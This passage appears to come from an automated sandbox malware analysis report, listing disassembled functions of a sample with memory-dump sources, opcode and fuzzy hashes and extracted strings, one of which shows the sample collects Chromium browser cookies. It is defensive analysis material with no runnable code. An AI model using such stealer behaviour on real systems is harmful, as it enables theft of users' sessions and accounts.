                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #M*O$.A+C$<Y9[$de
                                                                        • API String ID: 0-619215113
                                                                        • Opcode ID: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                                        • Instruction ID: 4dd909bd23f3416bf2a1fff02f6e225b67e89fc74424d8c467e39d9789e90e9e
                                                                        • Opcode Fuzzy Hash: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                                        • Instruction Fuzzy Hash: B34199706087918BC728DF04C0907ABBBF1FF86354F415A1CE8C65B790E7B99806CB8A
                                                                        Function 005875BA Relevance: 4.9, Strings: 3, Instructions: 1198COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2PBb$Yceh$]hW9
                                                                        • API String ID: 0-1551782443
                                                                        • Opcode ID: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                                        • Instruction ID: 7d538e072a880e7ff670c199d3c3d9f18867b2d28bd0b34200a66c058738c5a2
                                                                        • Opcode Fuzzy Hash: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                                        • Instruction Fuzzy Hash: 95927B70104B808EE726CF35C4A47E3BBE1BF16305F58499CD5EB9B282DB79A50ACB51
                                                                        Function 00425CEE Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: 7452$7452$JlRp
                                                                        • API String ID: 2994545307-3284767125
                                                                        • Opcode ID: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                                        • Instruction ID: e650c655e12bce7b67b4aee498b20d7031e1d261d0f6e781b1df18e503fb0051
                                                                        • Opcode Fuzzy Hash: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                                        • Instruction Fuzzy Hash: 5F52AC70205B908BE325CF29D5907A3BBE2BF56304F948A5EC4DB8B785C739B409CB59
                                                                        Function 00585F55 Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7452$7452$JlRp
                                                                        • API String ID: 0-3284767125
                                                                        • Opcode ID: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                                        • Instruction ID: 85246c157c98308534ecba88506bf82af37ec0bb35b768cd998a0cf278dc2b3f
                                                                        • Opcode Fuzzy Hash: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                                        • Instruction Fuzzy Hash: 9752BC70205B818FE725CF29C4A07A3BBE2BF56304F548A1DC9DB9BA85C739B409CB51
                                                                        Function 0043B050 Relevance: 4.1, Strings: 3, Instructions: 343COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ' !"$R-,T$R-,T
                                                                        • API String ID: 0-1082949730
                                                                        • Opcode ID: e75057b926a2a012cfc5b95e756ec90b0a8b3874f516567e2f6050620a418b4c
                                                                        • Instruction ID: 9bdbef18e09c284a1484a8fdec6c79e1bfd0a8a4d41465c41f0146dce1d37148
                                                                        • Opcode Fuzzy Hash: e75057b926a2a012cfc5b95e756ec90b0a8b3874f516567e2f6050620a418b4c
                                                                        • Instruction Fuzzy Hash: 19B1BD75A083118BC724CF18C49076BB7E2FF88354F19866DE9995B391DB38EC11CB9A
                                                                        Function 0059B2B7 Relevance: 4.1, Strings: 3, Instructions: 343COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ' !"$R-,T$R-,T
                                                                        • API String ID: 0-1082949730
                                                                        • Opcode ID: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                                        • Instruction ID: adc225254141732651fcf0000e4b3abe3d872deb5bb8631b9c739f3002ff5408
                                                                        • Opcode Fuzzy Hash: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                                        • Instruction Fuzzy Hash: 9DB1D171A083018BEB14CF18D590A6BBBE2FFC8754F198A2CE8995B361D735EC11CB91
                                                                        Function 00405440 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$8
                                                                        • API String ID: 0-46163386
                                                                        • Opcode ID: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                                        • Instruction ID: dc0667dd8dba82da45780d667ad4d2091edccb94f5c689a9349702639bf5c4e6
                                                                        • Opcode Fuzzy Hash: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                                        • Instruction Fuzzy Hash: CF8213716087419FD720CF28C884B9BBBE1EF88314F44892EE989A7391D379D954CF96
                                                                        Function 005656A7 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$8
                                                                        • API String ID: 0-46163386
                                                                        • Opcode ID: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                                        • Instruction ID: 49868431961543d5767a52279b70c87284587a90c9ec6146a44910d6ebacdab7
                                                                        • Opcode Fuzzy Hash: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                                        • Instruction Fuzzy Hash: CF8256716087419FDB20CF28C884B9ABFE1BF88354F08892DF99987391E375D954CB92
                                                                        Function 00424B80 Relevance: 3.1, Strings: 2, Instructions: 561COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "$"
                                                                        • API String ID: 0-3758156766
                                                                        • Opcode ID: b98dada69d51fc25d54d09ae8fa78171f5f64f79720f4369853665ea9e9e0e52
                                                                        • Instruction ID: 4536deac87be68b66e6b1169164205a16b20366d1629798eb3173c915dafa2c3
                                                                        • Opcode Fuzzy Hash: b98dada69d51fc25d54d09ae8fa78171f5f64f79720f4369853665ea9e9e0e52
                                                                        • Instruction Fuzzy Hash: 2502F371B083249BD714CE29E89076BB7D5ABC4314F998A6EE8958B381D738DD048B86
                                                                        Function 00426174 Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7452$JlRp
                                                                        • API String ID: 0-1201309010
                                                                        • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                        • Instruction ID: 26763a119934df737aef44f96d102629e4e06364a32b506b5a4d198ec9095851
                                                                        • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                        • Instruction Fuzzy Hash: C0F19E70205B508FE329CF25D0A43A3BBE1BF56304F95896EC4EB8B785C739A449CB55
                                                                        Function 005863DB Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7452$JlRp
                                                                        • API String ID: 0-1201309010
                                                                        • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                        • Instruction ID: 77fa506cec73d6f6aaca31985b980345b1c60254dad0d4c2e63755da82c132c2
                                                                        • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                                        • Instruction Fuzzy Hash: 2BF17D70204B818FE329CF25C0A57A3BFE2BF56304F54896DC5EB9B685CB79A409CB51
                                                                        Function 00426284 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7452$JlRp
                                                                        • API String ID: 0-1201309010
                                                                        • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                        • Instruction ID: 3e43ac3292e75d8b218afd9fd32b7d1e5bc91179cd9b43390289dad712848b02
                                                                        • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                        • Instruction Fuzzy Hash: 02F19E70205B508FE329CF25D0A43A3BBE1BF56304F94896EC4EB8B785CB79A449CB55
                                                                        Function 005864EB Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7452$JlRp
                                                                        • API String ID: 0-1201309010
                                                                        • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                        • Instruction ID: df08214064b75a70c3053b9c50a78985c60d4026a78d0df9cc646cace96a329c
                                                                        • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                                        • Instruction Fuzzy Hash: D7F18D70204B818FE329CF25C0A57A3BFE2BF56304F54896DC5EB9B681C779A409CB51
                                                                        Function 00564BD7 Relevance: 2.9, Strings: 2, Instructions: 408COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$IEND
                                                                        • API String ID: 0-707183367
                                                                        • Opcode ID: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                                        • Instruction ID: 7ca859475fca0d5e3cc8ddd47826917de4c199e01efcad2a4b0903cbd36866a5
                                                                        • Opcode Fuzzy Hash: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                                        • Instruction Fuzzy Hash: 03E1E2B2A083459FD714CF28C88576EBBE1BF94314F148A2DF9959B381E775E904CB82
                                                                        Function 00426271 Relevance: 2.9, Strings: 2, Instructions: 393COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7452$JlRp
                                                                        • API String ID: 0-1201309010
                                                                        • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                        • Instruction ID: 2c0b636c8f7a7c10555f0b16b025c9559032f4b9242e28262834d6f33c4e1acb
                                                                        • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                        • Instruction Fuzzy Hash: 63D19E70205BA08FE325CF24D0A47A3BBE2BF56304F99495DC4EB8B385CB796449CB59
                                                                        Function 005864D8 Relevance: 2.9, Strings: 2, Instructions: 393COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7452$JlRp
                                                                        • API String ID: 0-1201309010
                                                                        • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                        • Instruction ID: 080383fe9af520ec217e7d66dfff554259444d9e0cf67007af29228c7af4692d
                                                                        • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                                        • Instruction Fuzzy Hash: BAD1AE70205B808FE325CF25C0A57A3BFE2BF56309F58895CC5EB9B686CB796409CB51
                                                                        Function 00580AE7 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ]hiX$gdeb
                                                                        • API String ID: 0-4273025081
                                                                        • Opcode ID: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                                        • Instruction ID: 9e7f722a1e6a7e2d8730826324bcf3839b59ba7553fba1c4361a2e753d027a50
                                                                        • Opcode Fuzzy Hash: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                                        • Instruction Fuzzy Hash: 17C1D3B16093418BD754DF18C89172BBBE2FFC5324F189A2DE895AB381D735D809CB82
                                                                        Function 00433D0A Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gdeb$gdeb
                                                                        • API String ID: 0-1883251077
                                                                        • Opcode ID: ee5e04d0d312f765b3611952300e7de386bdbcd7f57b7a65ecfe0b66ca22d5d4
                                                                        • Instruction ID: cf9f2457e42b5478319b54834123ade71b3d153c6120c0fe94c03a58d741c5db
                                                                        • Opcode Fuzzy Hash: ee5e04d0d312f765b3611952300e7de386bdbcd7f57b7a65ecfe0b66ca22d5d4
                                                                        • Instruction Fuzzy Hash: F1513678200B018FD724CF1AC490B27B7E1BB49319F14AA2DD59B8BB62C738F945DB58
                                                                        Function 00423AD0 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gdeb$gdeb
                                                                        • API String ID: 0-1883251077
                                                                        • Opcode ID: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                                        • Instruction ID: e92ea4fe5443a7465b3ee846efb2000115bf1a6242ab2642b3cbd9abe9ffc45f
                                                                        • Opcode Fuzzy Hash: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                                        • Instruction Fuzzy Hash: B531E274211B408BD328CF24C5A4727B7F2BF86706F945A1DC4930BF95C778BA469B84
                                                                        Function 00435EB0 Relevance: 1.9, Strings: 1, Instructions: 607COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ' !"
                                                                        • API String ID: 0-2098420348
                                                                        • Opcode ID: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                                        • Instruction ID: 55aad70b625533d885964fe9cb24da3c7b8194ed29cb22960a26a8a6f416ebd2
                                                                        • Opcode Fuzzy Hash: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                                        • Instruction Fuzzy Hash: C722B1716083119FD714CF18C890B2BFBE1BB89318F198A2EE8D597391C779D905CB9A
                                                                        Function 00596117 Relevance: 1.9, Strings: 1, Instructions: 607COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ' !"
                                                                        • API String ID: 0-2098420348
                                                                        • Opcode ID: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                                        • Instruction ID: bd82d374ed13b60cd0101555bd8463c7916c66f78bd884c9e0ff3247079a0eb8
                                                                        • Opcode Fuzzy Hash: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                                        • Instruction Fuzzy Hash: E2228FB56083518FDB14CF18C890B2BBBE1BB89314F188A2DE8D597291D775D909CB92
                                                                        Function 00561267 Relevance: 1.8, Strings: 1, Instructions: 519COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                                        • Instruction ID: f184e648954e5e5094040e5e7e021dfb6163732b55088f39e7a2b223003cee75
                                                                        • Opcode Fuzzy Hash: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                                        • Instruction Fuzzy Hash: CA121675908B958BEB14CE28C4A13BB7FE2BB91351F1CC91DE8968B3D1C3388945D786
                                                                        Function 00576B56 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: IO
                                                                        • API String ID: 0-3981347273
                                                                        • Opcode ID: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
                                                                        • Instruction ID: feddbdc7aae943690fd0bbf433bd7a51453645c0eba739861839f45c29869b08
                                                                        • Opcode Fuzzy Hash: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
                                                                        • Instruction Fuzzy Hash: B3D112B1200A018FDB25CF15D591B12BBF2FF4A704F148A9CD89A8FB56D739E845CB94
                                                                        Function 004164D2 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • v[info] collected cookies file of the chromium-based browser, xrefs: 004167B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: v[info] collected cookies file of the chromium-based browser
                                                                        • API String ID: 0-1851104220
                                                                        • Opcode ID: 0079c2c751aacdb32043d2065820f57f93782c76d64f3e8a70107f833be3a855
                                                                        • Instruction ID: e2aff65f3d6dc5062d0ba04aa46064ddba6db07fd0ccc2038df325f36c3021e5
                                                                        • Opcode Fuzzy Hash: 0079c2c751aacdb32043d2065820f57f93782c76d64f3e8a70107f833be3a855
                                                                        • Instruction Fuzzy Hash: 9EA18C706057418FD725CF28C1907A3BBE2BF66304F19869DC4964F796D33AE886CB98
                                                                        Function 00576739 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • v[info] collected cookies file of the chromium-based browser, xrefs: 00576A1A
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: v[info] collected cookies file of the chromium-based browser
                                                                        • API String ID: 0-1851104220
                                                                        • Opcode ID: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
                                                                        • Instruction ID: 9180274a382bc15ae4387d22afa2da7ca973d53291456e664073d9ba646da2dc
                                                                        • Opcode Fuzzy Hash: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
                                                                        • Instruction Fuzzy Hash: 66A17DB0605B418FD729CF29C490762BBE2BF56304F18C69CC49A4FB96C336E846DB95
                                                                        Function 0043AD30 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ' !"
                                                                        • API String ID: 0-2098420348
                                                                        • Opcode ID: a95402be4443cf254ac3e8f5f68522a920a2e14bcc9061eec3c4f28d46b23a28
                                                                        • Instruction ID: b21458e9d172f3a465188df86c848c015b63d16b5f46d67e3e5fb2f613f60a17
                                                                        • Opcode Fuzzy Hash: a95402be4443cf254ac3e8f5f68522a920a2e14bcc9061eec3c4f28d46b23a28
                                                                        • Instruction Fuzzy Hash: 8391DF746053029BDB28CF19C890B6BB7E2FF88754F18951DE8858B790D738EC61CB96
                                                                        Function 0059AF97 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ' !"
                                                                        • API String ID: 0-2098420348
                                                                        • Opcode ID: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
                                                                        • Instruction ID: 4d7ff6330528437e6d8d9238310adffc36c874b3ac51d7dc19a7aca1821b38aa
                                                                        • Opcode Fuzzy Hash: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
                                                                        • Instruction Fuzzy Hash: 90919D746053029BEB18CF18D9A4B6BBBE2FF84750F18891CE8858B251DB35EC11DB92
                                                                        Function 004067B0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,
                                                                        • API String ID: 0-3772416878
                                                                        • Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                                        • Instruction ID: 49ac68bff1f266d30a48b1e8e6a747f7736882c678fe7bbee82a01b3dca97335
                                                                        • Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
